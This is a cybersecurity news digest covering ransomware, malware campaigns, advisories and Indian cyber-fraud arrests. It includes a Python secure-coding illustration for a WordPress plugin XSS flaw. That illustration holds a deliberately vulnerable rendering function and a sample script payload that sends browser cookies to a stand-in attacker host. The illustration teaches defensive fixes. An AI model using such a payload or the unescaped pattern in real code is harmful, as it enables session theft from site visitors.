ConnectWise has officially confirmed that its remote access software ScreenConnect was compromised in a cyberattack, but reassures users that systems are now secure. The company states that it identified suspicious activity and acted swiftly to mitigate risks, patch vulnerabilities, and strengthen defenses. Although ConnectWise has not disclosed the full scope or the attacker's identity, sources suggest that the exploit may have been used for unauthorized remote access. ScreenConnect is widely used by managed service providers (MSPs), raising alarms about potential cascading impacts on end clients. Cybersecurity experts are closely monitoring for signs of follow-on attacks, particularly data theft or malware deployment. ConnectWise has initiated a comprehensive security review and is urging partners to update their systems and adopt additional security practices. The incident adds to a growing list of supply chain and software-based cyber threats, emphasizing the need for constant vigilance and rapid incident response across tech service platforms.
MATLAB Targeted in Ransomware Attack, Disrupting Data Access and Operations
A ransomware attack has targeted MathWorks' MATLAB, a widely used software platform for engineering and data science, disrupting operations and locking access to critical files. The attack involved encrypting user data and demanding ransom payments for decryption. The company has acknowledged the breach but has not confirmed the extent of damage or whether any ransom will be paid. Academic institutions and engineering firms that rely heavily on MATLAB for simulation and analysis work have reported temporary work stoppages due to inaccessible files. The attackers allegedly exploited a known vulnerability in the platform's integration components. Security analysts warn this attack may signal a shift in ransomware targeting strategies — focusing on niche, high-dependency software used in research and industry. The incident underscores the need for frequent patching and secure software practices in technical environments. Organizations are now urged to reassess the cybersecurity posture of their critical toolsets and ensure adequate backup protocols.
Cyberattack Surge Spurs Insurance Rethink and Premium Hike Discussions
A surge in cyberattacks across multiple sectors is creating opportunities for insurers while prompting a reassessment of how cyber risk is priced and covered. The rise in ransomware, data breaches, and supply chain attacks has led to increased claims, challenging traditional underwriting models. Insurers are now introducing more restrictive policies, raising premiums, and implementing stricter conditions such as mandatory multi-factor authentication and third-party risk audits. At the same time, the insurance industry sees growth potential in developing more tailored cyber products and services for small to mid-sized enterprises, which are increasingly targeted by threat actors. Some providers are also exploring cyber risk-sharing partnerships with governments or using advanced data analytics to model threat scenarios more effectively. As cyber threats continue to evolve, businesses are being urged to view insurance as part of a broader risk management strategy — one that includes technical defenses, staff training, incident response planning, and regulatory compliance readiness.
WordPress TI WooCommerce Wishlist Plugin Found Vulnerable to Exploitation
A critical vulnerability has been discovered in the popular TI WooCommerce Wishlist plugin for WordPress, affecting over 100,000 active installations. The flaw, identified as an unauthenticated stored cross-site scripting (XSS) vulnerability, allows attackers to inject malicious scripts that can compromise site visitors and administrators. The vulnerability stems from improper sanitization of user input, enabling threat actors to exploit the plugin through specially crafted URLs or comments. This could lead to session hijacking, credential theft, or the deployment of malware. Security researchers have notified the developers, who have since released an urgent patch. Site administrators are being strongly advised to update the plugin immediately and conduct security scans for potential infections. The incident serves as a reminder of the risks posed by third-party plugins in content management systems and highlights the importance of regular plugin audits, software updates, and the use of security monitoring tools in maintaining WordPress website integrity.
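The report attributes the plugin flaw to improper sanitization of user input reaching pages through crafted URLs or comments. As an added illustration (not the plugin's code, and written in Python rather than the plugin's PHP so the same pattern is visible outside WordPress), the block below shows the vulnerable rendering pattern next to a hardened one: untrusted text is HTML-escaped for the element and attribute context it lands in, and user-supplied links are restricted to http, https, or site-relative paths so that a `javascript:` URL cannot become an executable href. Function names and the sample inputs are constructed for the example.

```python
import html
from urllib.parse import urlsplit


def render_item_vulnerable(name: str, url: str) -> str:
    """Vulnerable pattern: untrusted values dropped straight into markup and an href.
    Kept here only to show the difference; never ship this."""
    return f'<li><a href="{url}">{name}</a></li>'


def safe_url(url: str) -> str:
    """Allow http(s) URLs and site-relative paths; anything else (javascript:, data:,
    vbscript:, protocol-relative //host) is replaced with an inert fragment link."""
    url = url.strip()
    try:
        parts = urlsplit(url)
    except ValueError:
        return "#"
    scheme = parts.scheme.lower()
    relative_path = scheme == "" and url.startswith("/") and not url.startswith("//")
    if scheme in ("http", "https") or relative_path:
        # Escape for the attribute context: quotes and ampersands must not break out.
        return html.escape(url, quote=True)
    return "#"


def render_item_safe(name: str, url: str) -> str:
    """Hardened pattern: context-aware output encoding for text and attribute values,
    plus a URL scheme allowlist. Escaping at output time is what a stored XSS fix needs,
    because the payload may already be in the database."""
    return f'<li><a href="{safe_url(url)}">{html.escape(name, quote=True)}</a></li>'


if __name__ == "__main__":
    # Constructed attacker-style inputs of the kind a wishlist name or link field might carry.
    payload_name = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    payload_url = "javascript:alert(1)"
    print(render_item_vulnerable(payload_name, payload_url))
    print(render_item_safe(payload_name, payload_url))
```

The order of operations matters: validate the URL scheme on the raw value first, then escape for the attribute context. Escaping alone would not stop `javascript:` in an href, and scheme checking alone would not stop a quote that closes the attribute and injects a new one.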
CISA, NSA, FBI Release Joint Guidelines on Securing AI and Sensitive Data
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA and FBI, has issued new guidelines focused on safeguarding AI systems and the sensitive data they process. The joint advisory outlines risks related to data poisoning, model theft, adversarial inputs, and abuse of generative AI tools by threat actors. These concerns are especially critical for defense, healthcare, and critical infrastructure sectors integrating AI into operational frameworks. The guidance emphasizes the need for secure model training environments, robust data validation, access controls, and continuous monitoring to detect anomalies in AI behavior. It also warns against over-reliance on black-box AI solutions without transparency or auditability. Organizations are encouraged to adopt a zero-trust architecture and implement AI-specific threat modeling practices. The release of these guidelines marks a significant step in formalizing AI security as a core aspect of national cyber defense, urging both public and private sectors to act proactively.
FormBook Malware Campaign Targets Windows Users with Phishing and Info-Stealing
A new wave of FormBook malware attacks is actively targeting Windows users via phishing campaigns designed to steal sensitive information such as credentials, screenshots, and keystrokes. The malware is being delivered through malicious email attachments disguised as business documents, invoices, or shipping notices. Once executed, it establishes persistence on the host machine and begins exfiltrating data to remote command-and-control servers. The current campaign features enhanced obfuscation techniques to evade traditional antivirus software, making detection more difficult. Cybersecurity analysts have identified a sharp increase in attacks originating from known threat actor clusters leveraging compromised email accounts. Organizations are advised to train employees on phishing identification, deploy endpoint detection and response (EDR) solutions, and monitor network traffic for anomalies. The FormBook malware remains a persistent threat due to its low cost, wide availability on underground forums, and effectiveness against poorly secured systems, particularly in small and medium-sized enterprises with limited cybersecurity budgets.
CISA Flags Critical Vulnerability in Johnson Controls iSTAR Controllers
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a security advisory warning about a critical vulnerability in Johnson Controls' iSTAR Ultra access control devices, used widely in government and commercial buildings. The vulnerability, tracked as CVE-2024-23192, could allow remote attackers to gain full control of affected devices by sending specially crafted requests. This poses a significant risk to physical security systems and facility infrastructure. Exploitation of this flaw could lead to unauthorized access, data theft, or operational disruption. CISA is urging all affected entities to update to the latest firmware versions immediately and to segment network access for these devices. Johnson Controls has issued a patch and is coordinating with federal agencies to ensure secure deployment. This vulnerability underscores the growing convergence of IT and OT threats, especially in building automation and physical access technologies, where cyber incidents could have real-world safety and security consequences.
Hackers Allegedly Claim AT&T Data Leak Involving 70 Million Customers
Hackers are allegedly claiming responsibility for a significant data leak involving AT&T customer information, including details from up to 70 million accounts. The breach was reportedly posted on underground forums, with samples showing names, phone numbers, addresses, and Social Security numbers. AT&T has not officially confirmed the breach but has initiated an internal investigation and involved third-party forensic experts to verify the authenticity of the claims. The company previously denied similar data exposure incidents, but the recurrence of such leaks has cast doubts on its security assurances. Cybersecurity experts warn that if validated, the leak could have massive implications for consumer privacy and potential fraud, such as identity theft and phishing attacks. Affected users are advised to monitor their credit reports, enable account alerts, and avoid unsolicited communications. The incident highlights ongoing concerns about telecom data security and the long-term risks of storing massive customer datasets without robust protections.
RobbinHood Ransomware Operator Charged for High-Profile Attacks on U.S. Cities
U.S. authorities have formally charged a key operator behind the RobbinHood ransomware, linked to several high-profile attacks on municipal systems, including those in Baltimore and Atlanta. The Department of Justice alleges that the accused developed and deployed ransomware to encrypt critical government infrastructure, demanding substantial ransoms in cryptocurrency. The attacks disrupted public services such as emergency response, tax systems, and city operations, resulting in millions of dollars in recovery costs. Law enforcement traced the perpetrator using cryptocurrency transaction trails, digital infrastructure logs, and international cooperation. The indictment is seen as a significant milestone in holding ransomware developers accountable and may serve as a deterrent to other cybercriminals. However, cybersecurity professionals stress that while one arrest is a victory, broader systemic challenges in ransomware prevention and resilience remain. The case underscores the importance of investment in municipal cyber defense and the necessity of coordinated responses across law enforcement and cybersecurity agencies.
Africa and the Middle East
Iranian Cyber Toufan Hackers Target Global Organizations Using Custom Backdoors
A new Iranian threat group, dubbed "Cyber Toufan," has emerged with sophisticated cyberattack campaigns targeting organizations across various sectors using custom-built malware and backdoors. According to cybersecurity researchers, this group is focused on espionage and data exfiltration operations, particularly against government, defense, and critical infrastructure entities. The hackers employ advanced spear-phishing techniques and exploit known vulnerabilities in enterprise software to gain initial access. Once inside, they deploy backdoors like "PowerDash" to maintain persistent access and extract sensitive data. Analysts suggest the group's operations are politically motivated and aligned with Iran's strategic interests, possibly under state sponsorship. The malware's obfuscation techniques and command-and-control infrastructure indicate a high level of operational maturity. As global tensions rise, cybersecurity experts warn that such state-linked threat actors will likely escalate their campaigns, urging organizations to patch known vulnerabilities, enhance detection capabilities, and monitor for indicators of compromise linked to Cyber Toufan's tactics and tools.
INE Security and RedTeam Hacker Academy Forge Partnership to Advance Cyber Training
INE Security and RedTeam Hacker Academy have announced a strategic partnership to enhance cybersecurity education and professional training worldwide. This collaboration aims to bridge the skills gap in the cybersecurity industry by offering high-quality, hands-on training programs tailored to beginners, professionals, and enterprise teams. The alliance combines INE's robust e-learning platform and global reach with RedTeam's expertise in offensive security and practical workshops, particularly in the Asia-Pacific and Middle East regions. Together, they plan to roll out a unified curriculum that includes penetration testing, ethical hacking, incident response, and cloud security courses. Students will have access to virtual labs, certification tracks, and expert-led sessions designed to simulate real-world cyber threats. Both organizations emphasize the importance of continuous education in combating evolving cyber threats and building a global workforce capable of defending critical systems. This partnership reflects a growing trend of industry collaboration aimed at solving the persistent shortage of skilled cybersecurity professionals.
Cybersecurity Skills Development in Africa Undermined by Lack of Funding and Political Commitment
Africa's cybersecurity landscape is being threatened not only by external attacks but also by a critical shortage of skilled professionals, largely due to limited investment and weak political will. A new report highlights the continent's struggle to build a sustainable cybersecurity workforce amid rising digital adoption and increasing cyber threats. Despite the growing demand for trained personnel in both the public and private sectors, governments across the region have been slow to prioritize cybersecurity education and capacity building. Most initiatives remain fragmented, underfunded, and dependent on international donors. Experts warn that without systemic reforms and long-term investment in training programs, African nations risk becoming soft targets for cybercriminals and state-sponsored actors. There is a pressing need for coordinated strategies that include curriculum development, academic-industry partnerships, and incentive structures to retain local talent. As cyber threats grow in scale and sophistication, Africa's digital resilience hinges on addressing this foundational skills deficit.
Microsoft Launches Regional Cybersecurity Initiative Across Africa
Microsoft has launched a continent-wide cybersecurity initiative aimed at strengthening digital defenses across Africa through regional partnerships, skills training, and infrastructure investment. The program, part of Microsoft's broader Digital Development strategy, focuses on collaboration with local governments, universities, and private sector stakeholders to build cyber resilience. Key components include setting up cybersecurity skilling centers, supporting regulatory frameworks, and enhancing early threat detection capabilities. Microsoft also plans to work closely with law enforcement agencies to combat cybercrime and foster secure cloud adoption. The initiative acknowledges Africa's increasing internet penetration and digital transformation, which has made the region a growing target for cyberattacks. By bolstering local talent and security practices, Microsoft aims to create a sustainable security ecosystem that supports economic growth and public trust. This strategic move not only strengthens Microsoft's market presence but also aligns with global efforts to address cybersecurity gaps in underserved and emerging digital economies.
EFCC Warns of Insider-Supported Cyberattacks Targeting Nigerian Banks
Nigeria's Economic and Financial Crimes Commission (EFCC) has issued a warning about an alarming rise in insider-assisted cyberattacks on Nigerian banks. According to the commission, many of these attacks are facilitated by employees who exploit internal access privileges to bypass security controls, steal data, and assist external hackers. This trend poses a significant threat to the nation's financial infrastructure, especially as digital banking continues to expand. The EFCC revealed that some staff members are either coerced or voluntarily participate in these schemes, underscoring the need for stronger internal monitoring, access control, and employee vetting. The agency is now working with the Central Bank of Nigeria and financial institutions to introduce stricter cybersecurity protocols and mandatory staff training. This development has sparked calls for banks to prioritize zero-trust architectures and robust insider threat detection tools. The EFCC also urged the public to remain vigilant against phishing and other fraud vectors tied to these coordinated attacks.
Latin America
$93 Billion Stolen via Hijacked User Cookies Fuels Rising Cybercrime Surge
A staggering $93 billion worth of digital assets has reportedly been stolen through hijacked user cookies, underscoring the growing threat posed by session hijacking attacks. Cybercriminals are increasingly using information-stealing malware to extract authentication cookies from browsers, enabling them to bypass login credentials and access victims' online accounts. These cookies, once exfiltrated, are sold on dark web markets or used directly for financial fraud, corporate espionage, and unauthorized access to cloud services. The scale of the theft illustrates how effective cookie-based attacks have become in evading traditional security measures like two-factor authentication. Experts warn that many organizations are unaware of these stealthy compromises, which can persist undetected for extended periods. Cybersecurity professionals are urging users and businesses to implement stronger session management protocols, regularly clear browser cookies, and adopt endpoint detection solutions to mitigate these risks. The report highlights a pressing need for modern security architectures that prioritize identity protection and anomaly detection.
Fake Mobile Invoice Apps Spread Malware to Steal Users' Banking Credentials
A new wave of mobile malware is targeting users by disguising itself as legitimate invoice applications, with the intent of stealing sensitive banking information. Kaspersky researchers uncovered this campaign, which primarily affects Android users and employs phishing techniques to trick victims into downloading malicious apps. Once installed, the malware overlays legitimate banking applications with fake login screens to capture credentials and intercept two-factor authentication codes. The malware also has keylogging and screen recording capabilities, making it highly effective in data theft. The deceptive use of business-related themes like invoices increases the likelihood of victims trusting and interacting with the malware. Kaspersky warns that the attackers are leveraging increasingly sophisticated methods to avoid detection, such as dynamic command-and-control channels and permission abuse. Users are advised to avoid downloading apps from unofficial sources, review app permissions critically, and use reputable mobile security solutions to defend against this evolving mobile threat landscape.
Zanubis Android Malware Campaign Harvests Banking Credentials from Latin American Users
A new Android malware strain named "Zanubis" has been detected targeting users in Latin America, designed specifically to harvest banking credentials through advanced social engineering and device control techniques. Researchers revealed that Zanubis impersonates legitimate financial apps to deceive victims into granting accessibility permissions, allowing the malware to take full control of the infected device. It can record keystrokes, capture screen content, and even interact with banking applications in real-time to bypass security measures. Notably, Zanubis can also deactivate legitimate antivirus tools and ensure persistence by exploiting system settings. This campaign appears to be regionally focused, with a growing list of financial institutions in the crosshairs. The malware's modular structure suggests ongoing development and adaptability for broader use. Security experts urge Android users, particularly in Latin America, to update their systems regularly, download apps only from trusted sources like Google Play, and stay alert to suspicious app behaviors or permissions prompts.
Special Focus on India
Two Arrested in ₹69 Lakh Cyber Fraud Case in Rajkot
Rajkot police have apprehended two individuals involved in a cyber fraud case amounting to ₹69 lakh, in which the accused duped multiple victims through fake online investment platforms. The suspects created fraudulent websites and used social media to lure victims by promising high returns on cryptocurrency and stock investments. Once funds were transferred, the fraudsters cut all communication, making it difficult for victims to recover their money. The police, following digital footprints and financial trails, traced the perpetrators and recovered incriminating evidence, including digital devices and bank records. The case reflects a growing trend in tech-enabled financial scams in India, where cybercriminals exploit people's aspirations for quick financial gains. Authorities have urged the public to remain vigilant and verify investment platforms before making any transactions. Law enforcement is now broadening the investigation to track more individuals possibly connected to this interstate cybercrime network and prevent future occurrences.
Chinese Surveillance Allegations Trigger Alarm in Indian Cyber Circles
India's intelligence community has raised alarms over widespread Chinese surveillance activities allegedly targeting sensitive infrastructure and communication networks, sparking a wave of scrutiny across the surveillance technology sector. According to a Reuters investigation, Indian authorities have begun intensifying checks on equipment and software originating from Chinese firms amid concerns of data exfiltration, espionage, and critical infrastructure vulnerabilities. Industry insiders report that surveillance systems sourced from China are under active review, and several deployments may be suspended or replaced with alternatives. The heightened scrutiny follows previous border tensions and rising geopolitical rivalry, accelerating India's push for indigenous solutions and stricter import controls. National cybersecurity agencies are now advising private firms and government departments to audit all foreign surveillance hardware and software, with a focus on data sovereignty. This incident underlines how geopolitical tensions can influence cybersecurity strategy and national policy, prompting governments to reassess foreign dependencies in critical technology ecosystems.
Asian School of Cyber Laws and GLC Mumbai Launch Advanced Cyber Law Program
The Asian School of Cyber Laws, in collaboration with Government Law College (GLC) Mumbai, has launched an Advanced Program on Cyber Law to address the growing need for legal professionals equipped with cybersecurity expertise. The initiative is designed for lawyers, policymakers, and technologists aiming to deepen their understanding of digital rights, cybercrime, privacy legislation, and emerging tech regulations such as AI governance and data protection. The course curriculum includes case studies, practical legal frameworks, and insights from global cybersecurity trends. With cybercrime on the rise and increasing overlap between technology and law, this program seeks to bridge the gap in legal education and build a robust talent pipeline for cyber law specialists in India. The organizers emphasize that India's expanding digital infrastructure necessitates stronger legal safeguards, and trained professionals will play a crucial role in shaping and enforcing cyber jurisprudence in both public and private sectors.
APT36 SideCopy Hackers Intensify Targeting of India's Critical Infrastructure
APT36, a Pakistan-linked threat actor also known as SideCopy, has ramped up cyber espionage campaigns against India's critical infrastructure using highly customized malware and deceptive phishing tactics. Security researchers report that the group is exploiting vulnerabilities in legacy systems and deploying tailored payloads to infiltrate government and defense networks. Recent attacks have been traced to spear-phishing emails posing as government officials or trusted vendors, delivering malware designed to extract credentials, documents, and network configurations. The group's operations align with geopolitical motives and long-term surveillance goals, particularly focused on defense research, foreign affairs, and energy sectors. Analysts highlight that APT36 is evolving its tradecraft, including adopting evasion techniques and fileless malware to bypass detection. The Indian government has elevated its cyber alert level and issued advisories to critical sector operators. This campaign underscores the persistent and politically motivated nature of advanced persistent threats targeting national security infrastructure.
Odisha Crime Branch Arrests Two in ₹1.08 Crore Cyber Fraud Case
Odisha's Crime Branch has arrested two individuals linked to a cyber fraud scheme worth ₹1.08 crore, involving sophisticated phishing and identity theft. The accused allegedly impersonated bank officials to dupe victims into sharing OTPs and banking credentials under the guise of resolving KYC issues. Once obtained, they used the data to siphon off large sums from victims' accounts. Investigations revealed the use of multiple fake SIM cards and fraudulent bank accounts across several states, pointing to a well-organized cybercriminal network. The authorities seized mobile devices, SIM cards, and laptops containing transaction data. The case highlights the alarming scale of financial cyber fraud in India, particularly frauds that exploit social engineering tactics. Officials emphasized the importance of public awareness and digital literacy in combating such crimes. The Crime Branch has widened its investigation, anticipating further arrests and uncovering links to larger interstate or possibly international fraud syndicates.
Gurgaon Sextortion Cybercrime Network Busted; 55 Arrested for ₹840 Crore Scam
In a major crackdown, Indian law enforcement has dismantled a massive cybercrime syndicate operating out of Gurgaon involved in sextortion frauds and investment scams, with total estimated fraud exceeding ₹840 crore. Police arrested 55 individuals and recovered over 1,200 mobile phones, hundreds of fake SIM cards, and digital tools used to blackmail victims. The gang allegedly tricked individuals into compromising video calls and then extorted them by threatening to share the footage unless large sums were paid. In parallel, they also operated fraudulent investment apps promising high returns, luring victims with fake testimonials and social media promotions. Authorities believe this network had a widespread victim base across India and possibly abroad. Cyber police are now working to trace financial flows and dismantle associated digital infrastructure. This case underscores the increasing sophistication and scale of cyber frauds in India, demanding improved public education, stricter digital KYC enforcement, and inter-agency coordination.
Integrated Cybersecurity Solution Lab to Be Built in Goa at ₹89.4 Crore
The Indian government has approved the establishment of an Integrated Cybersecurity Solution Lab in Goa, with an estimated investment of ₹89.4 crore. The lab aims to enhance national cybersecurity preparedness by developing indigenous solutions, conducting advanced research, and training skilled personnel in cyber defense and response. Planned under the National Cyber Security Strategy framework, the facility will focus on simulating real-time cyberattack scenarios, conducting vulnerability assessments, and testing defense technologies across sectors such as defense, power, and finance. The initiative reflects a strategic push towards strengthening India's cyber infrastructure amid rising threats from both domestic and international threat actors. Officials highlight that the lab will also collaborate with academic institutions, start-ups, and defense agencies to foster innovation in cybersecurity tools and protocols. This project is part of broader efforts to reduce dependency on foreign cybersecurity solutions and to build a resilient national cyber ecosystem grounded in self-reliance and robust capability.
Senior Citizen in Bengaluru Loses ₹2.5 Lakh to Cyber Fraud
A 70-year-old senior citizen in Bengaluru has fallen victim to cyber fraud, losing ₹2.5 lakh after being tricked by scammers posing as bank officials. The victim received a call warning of a potential account freeze due to incomplete KYC compliance and was prompted to share personal and banking details to avoid penalties. Believing the call to be legitimate, he shared sensitive credentials, which were then used to conduct unauthorized transactions. The incident was reported to the police, who have registered a cybercrime case and are tracking the fraudsters through call records and financial trails. This case is a stark reminder of the growing number of elderly individuals being targeted in tech-enabled scams due to lower digital literacy. Authorities are urging families to educate senior members on the dangers of sharing personal information and to use digital tools like transaction alerts and account freezing features to mitigate such risks.
Wedding Invite Scam Uses Fake APK Files to Hijack Phones and Steal Data
Cybercriminals are exploiting social occasions by distributing fake wedding invitation APK files that install malware on victims' phones to steal sensitive banking data. Victims receive messages with links disguised as wedding invites, encouraging them to download the attached app file. Upon installation, the malware gains access to SMS, contacts, and banking apps, enabling attackers to intercept OTPs and conduct unauthorized financial transactions. Security experts have traced the malware to known financial cybercrime groups that frequently update their techniques to bypass detection. With increasing reliance on digital communication for personal events, this scam is catching many off guard, especially those unfamiliar with APK file risks. Authorities have issued public warnings advising users to only download apps from official platforms like Google Play Store and to avoid clicking unknown links, even from seemingly familiar contacts. This incident highlights the evolving tactics of cybercriminals and the importance of app hygiene and mobile device security.
Bengaluru Woman Loses ₹7.5 Lakh in Remote Job Cyber Scam
A woman from Bengaluru searching for a work-from-home job was scammed out of ₹7.5 lakh by fraudsters posing as recruiters. She responded to an online job posting and was asked to pay "processing fees" and "security deposits" in phases, all under the pretense of onboarding procedures for a remote role. The scammers created fake websites and impersonated HR representatives of reputed firms, maintaining convincing communication throughout the process. Realizing she had been duped, she filed a police complaint, and a cybercrime investigation is now underway. Authorities recovered digital trails including WhatsApp chats, forged appointment letters, and transaction details. This scam is part of a growing trend where fraudsters exploit rising demand for remote work by leveraging fake job offers. Law enforcement and cybersecurity officials are urging job seekers to verify opportunities through official company portals and refrain from paying upfront money for employment processing or documentation.
Phishing Syndicate Busted in Morigaon; 7,000 Fake SIMs, 265 Arrested
A major cybercrime crackdown in Morigaon, Assam, led to the arrest of 265 individuals involved in a phishing and identity fraud syndicate using over 7,000 fake SIM cards. The gang orchestrated widespread scams across India by obtaining SIMs through forged documents, which were then used for phishing calls, fake UPI registrations, and OTP interception. Police raids uncovered a large number of electronic devices, SIM card activation kits, and digital evidence of financial fraud. Authorities believe the syndicate was responsible for scams involving fake job offers, lottery winnings, and impersonation of government officials. This bust reflects the scale of SIM-enabled fraud and its connection to wider cybercriminal operations. Telecom regulators are now under pressure to strengthen KYC norms and conduct stringent checks on SIM issuance. The operation is considered a significant step in dismantling organized cybercrime rings exploiting telecom loopholes and endangering national digital trust and financial systems.